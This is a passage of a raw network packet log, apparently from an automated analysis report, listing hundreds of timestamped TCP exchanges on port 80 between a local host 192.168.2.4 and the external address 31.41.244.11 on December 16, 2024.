                                                                                                                                                                                              Dec 16, 2024 01:01:28.111529112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.111675024 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.111682892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.111716032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.112371922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.112441063 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.112536907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.112646103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.113228083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.113327026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.113375902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.114057064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.114098072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.114262104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.114310026 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.114881992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.114938021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.115014076 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.115145922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.115746975 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.115808010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.115848064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.115888119 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.116569996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.116615057 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.116631031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.116667986 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.117419958 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.117465019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.117515087 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.117554903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.118243933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.118288994 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.118338108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.118376970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.119080067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.119141102 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.119179964 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.119225979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.119951010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.120062113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.120102882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.120145082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.120774031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.120824099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.120862961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.120995998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.121620893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.121665955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.121736050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.121783018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.122433901 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.122477055 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.122533083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.122575998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.123296022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.123339891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.123385906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.123445034 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.124124050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.124181986 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.124222994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.124351978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.124955893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.125065088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.125113964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.125880003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.125926018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.125972986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.126017094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.126631021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.126677036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.126722097 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.126765966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.127490997 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.127536058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.127582073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.127643108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.128312111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.128381968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.128422022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.128547907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.129163027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.129260063 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.129271030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.129314899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.129988909 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.130039930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.130132914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.130207062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.130850077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.130907059 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.130953074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.131117105 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.131688118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.131798029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.131833076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.132534027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.132581949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.132651091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.132725954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.133349895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.133399963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.133445978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.133536100 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.134202003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.134300947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.134351015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.135031939 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.135103941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.135135889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.135236025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.135890007 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.135941029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.135974884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.136014938 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.136704922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.136749029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.136810064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.136859894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.137550116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.137593985 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.137651920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.137960911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.138389111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.138439894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.138488054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.138529062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.139230013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.139270067 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.139338970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.139378071 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.140059948 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.140113115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.235008955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.235054016 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.235059977 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.235101938 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.235285044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.235338926 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.235470057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.235512018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.236166954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.236217022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.236350060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.236411095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.237031937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.237078905 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.291429996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.291455030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.291477919 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.291495085 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.291584969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.291624069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.291666031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.291707039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.292419910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.292464972 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.292512894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.292551041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.293246984 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.293293953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.293515921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.293559074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.293643951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.293776989 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.294439077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.294512987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.294528961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.294545889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.295232058 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.295279026 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.295309067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.295348883 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.296039104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.296190023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.296237946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.296879053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.296921968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.296996117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.297043085 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.297714949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.297760963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.297833920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.297909021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.298567057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.298655033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.298688889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.298717022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.299422026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.299468040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.299518108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.299643040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.300229073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.300271988 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.300323963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.300491095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.301076889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.301135063 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.301182985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.301223993 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.301907063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.301953077 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.302025080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.302064896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.302748919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.302870035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.302886963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.302906036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.303589106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.303706884 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.303713083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.303750038 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.304445028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.304488897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.304534912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.304873943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.305274010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.305401087 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.305404902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.305449963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309541941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309570074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309587955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309588909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309606075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309618950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309623957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309633017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309643030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309648037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309664011 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309669018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309678078 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309703112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309864998 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.309906006 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.310600042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.310619116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.310643911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.310662031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.311499119 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.311547041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.311680079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.311723948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.312383890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.312402010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.312429905 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.312444925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.313266993 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.313283920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.313329935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.313937902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.313978910 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314120054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314162016 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314814091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314841986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314861059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314861059 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314878941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314889908 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314903021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.314919949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.315359116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.315471888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.315511942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.316220999 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.316263914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.316313982 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.316354036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.317039967 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.317086935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.317138910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.317260027 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.317871094 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.317929029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.317975044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.318022013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.318722963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.318769932 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.318815947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.318870068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.319556952 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.319673061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.319719076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.320391893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.320440054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.320525885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.320687056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.321247101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.321300983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.321338892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.321491957 CET4980080192.168.2.431.41.244.11
